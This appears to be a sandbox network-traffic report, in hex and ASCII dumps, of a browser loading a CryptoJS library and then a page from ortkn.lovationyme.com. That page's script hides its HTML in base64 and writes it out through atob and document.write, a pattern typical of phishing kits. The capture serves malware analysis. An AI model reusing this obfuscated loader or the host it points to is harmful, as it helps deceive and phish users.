                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:02 UTC443INData Raw: 37 63 30 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 7c01!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:02 UTC1369INData Raw: 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 74 2e 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:02 UTC1369INData Raw: 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 73 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){var t=s.clone.call(this);re
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:02 UTC1369INData Raw: 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 28 69 2c 68 29 3b 65 3d 69 2e 73 70 6c 69 63 65 28 30 2c 63 29 2c 72 2e 73 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock(i,h);e=i.splice(0,c),r.si
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:02 UTC1369INData Raw: 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:02 UTC1369INData Raw: 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 3b 6b 74 5b 72 5d 3d 73 5e 63 7d 74 5b 30 5d 3d 6b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+((65535&i)*i|0);kt[r]=s^c}t[0]=k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:02 UTC1369INData Raw: 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39 36 2a 6c 2e 61 62 73 28 6c 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 76 61 72 20 6f 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967296*l.abs(l.sin(t+1))|0}();var o=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:02 UTC1369INData Raw: 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 76 2c 32 33 2c 48 5b 33 39 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m=C(m,x,b,S,v,23,H[39]),S=C(S,m,x
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:02 UTC1369INData Raw: 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 44 28 74 2c 65 2c 72 2c 69 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o|c>>>32-o)+e}function D(t,e,r,i,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:02 UTC1369INData Raw: 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 42 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 31 2f 33 29 29 2c 69 2b 2b 29 2c 72 2b 2b 7d 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))),B[i]=e(n.pow(r,1/3)),i++),r++}(


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4192.168.2.449747172.67.220.614431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:02 UTC656OUTGET /5wLmN/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ortkn.lovationyme.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:03 UTC1039INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KIZFPS9OrA9fWxASVRdvOr9IVSgo3KGc8g9ja7rXoC8RQ2EMV56tjL41WuIWcl%2FTDH8LealHaGXV6ua1Yi8KK77aBYVP99H0CPlffDcrCX74CldDS%2Bdnd5jeEn82LA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6ImpwMWRud2dJVENxNDdSdGpZbnJlekE9PSIsInZhbHVlIjoiU0U5SlBEd1N3TzRvU3d2eWF3K2k4Z0VCWFBJakZDdTlSTUFxS0VkMGIybWEyTjJpRVM5cDV0SFBMdDhNT0FXV1lkcGM4V1JDajNiZ3orWlJ5U09wNFVkMWVhSFhlc1BvekpZdEFWa0VNS1dRZ0x2UnhObDZVbThqSm0vZkwxZ20iLCJtYWMiOiIwY2VlMWIzYzY3NWNlYTU0Nzc2NjdmODhmMzFhNjc0OTUzMGNhYjgwM2NkYWFlYTM4OWVmNTNmMjBiZTU0NzEzIiwidGFnIjoiIn0%3D; expires=Tue, 08-Oct-2024 21:13:03 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:03 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 42 36 4d 57 78 6d 62 57 4d 32 61 6d 68 6d 4f 57 59 72 54 33 6c 43 55 33 5a 61 63 46 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 62 79 74 31 51 31 6c 51 56 6d 31 70 59 7a 45 33 55 58 45 7a 64 48 46 44 55 6a 52 6e 59 56 6c 4a 55 6e 68 50 55 45 35 36 62 56 68 73 55 48 5a 47 56 33 55 7a 61 7a 55 32 5a 47 74 53 62 57 4e 4c 52 48 4a 49 62 30 4a 45 64 6a 52 6e 63 6d 56 45 55 55 46 59 52 56 4e 31 61 47 64 4f 57 6e 70 77 63 6b 63 30 65 56 70 30 64 48 49 76 51 6b 56 61 4d 6a 46 52 56 33 70 69 54 32 73 30 64 45 64 46 55 6c 4e 6e 4f 44 4e 36 62 47 5a 75 4e 53 74 35 4d 30 4d 79 57 6b 68 46 55 6a 46 47 57 55 4d 33 64 32 35 69 62 32 46 71 57 45 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjB6MWxmbWM2amhmOWYrT3lCU3ZacFE9PSIsInZhbHVlIjoibyt1Q1lQVm1pYzE3UXEzdHFDUjRnYVlJUnhPUE56bVhsUHZGV3UzazU2ZGtSbWNLRHJIb0JEdjRncmVEUUFYRVN1aGdOWnpwckc0eVp0dHIvQkVaMjFRV3piT2s0dEdFUlNnODN6bGZuNSt5M0MyWkhFUjFGWUM3d25ib2FqWE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:03 UTC1369INData Raw: 34 33 66 63 0d 0a 3c 21 2d 2d 20 54 68 65 20 73 74 61 72 74 69 6e 67 20 70 6f 69 6e 74 20 6f 66 20 61 6c 6c 20 61 63 68 69 65 76 65 6d 65 6e 74 20 69 73 20 64 65 73 69 72 65 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 50 55 6c 52 72 62 69 35 73 62 33 5a 68 64 47 6c 76 62 6e 6c 74 5a 53 35 6a 62 32 30 76 4e 58 64 4d 62 55 34 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 43fc... The starting point of all achievement is desire. --><script>if(atob("aHR0cHM6Ly9PUlRrbi5sb3ZhdGlvbnltZS5jb20vNXdMbU4v") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:03 UTC1369INData Raw: 46 54 6e 63 75 59 32 39 75 64 47 46 70 62 6d 56 79 65 33 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a 30 4f 69 42 68 64 58 52 76 4f 33 30 4e 43 69 4e 6a 52 30 5a 4c 59 31 5a 35 52 55 35 33 49 43 35 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 42 37 64 47 56 34 64 43 31 68 62 47 6c 6e 62 6a 6f 67 59 32 56 75 64 47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: FTncuY29udGFpbmVye3dpZHRoOiAxMDAlO3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCiNjR0ZLY1Z5RU53IC50ZXh0LWNlbnRlciB7dGV4dC1hbGlnbjogY2VudG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:03 UTC1369INData Raw: 5a 6d 5a 6d 4f 32 4e 76 62 47 39 79 4f 69 41 6a 4d 44 41 77 4f 33 42 68 5a 47 52 70 62 6d 63 36 49 44 49 77 63 48 67 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 78 4f 48 42 34 4f 32 39 32 5a 58 4a 7a 59 33 4a 76 62 47 77 74 59 6d 56 6f 59 58 5a 70 62 33 49 36 49 47 4e 76 62 6e 52 68 61 57 34 37 49 6a 34 4e 43 6a 77 68 4c 53 30 67 50 47 52 70 64 6a 35 45 62 32 34 6d 49 7a 41 7a 4f 54 74 30 49 48 64 68 64 47 4e 6f 49 48 52 6f 5a 53 42 6a 62 47 39 6a 61 7a 73 67 5a 47 38 67 64 32 68 68 64 43 42 70 64 43 42 6b 62 32 56 7a 4c 69 42 4c 5a 57 56 77 49 47 64 76 61 57 35 6e 4c 6a 77 76 5a 47 6c 32 50 69 41 74 4c 54 34 4b 50 47 52 70 64 69 42 70 5a 44 30 69 59 30 64 47 53 32 4e 57 65 55 56 4f 64 79 49 67 59 32 78 68 63 33 4d 39 49 6d 4e 76 62 6e 52 68 61 57 35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ZmZmO2NvbG9yOiAjMDAwO3BhZGRpbmc6IDIwcHg7Zm9udC1zaXplOiAxOHB4O292ZXJzY3JvbGwtYmVoYXZpb3I6IGNvbnRhaW47Ij4NCjwhLS0gPGRpdj5Eb24mIzAzOTt0IHdhdGNoIHRoZSBjbG9jazsgZG8gd2hhdCBpdCBkb2VzLiBLZWVwIGdvaW5nLjwvZGl2PiAtLT4KPGRpdiBpZD0iY0dGS2NWeUVOdyIgY2xhc3M9ImNvbnRhaW5
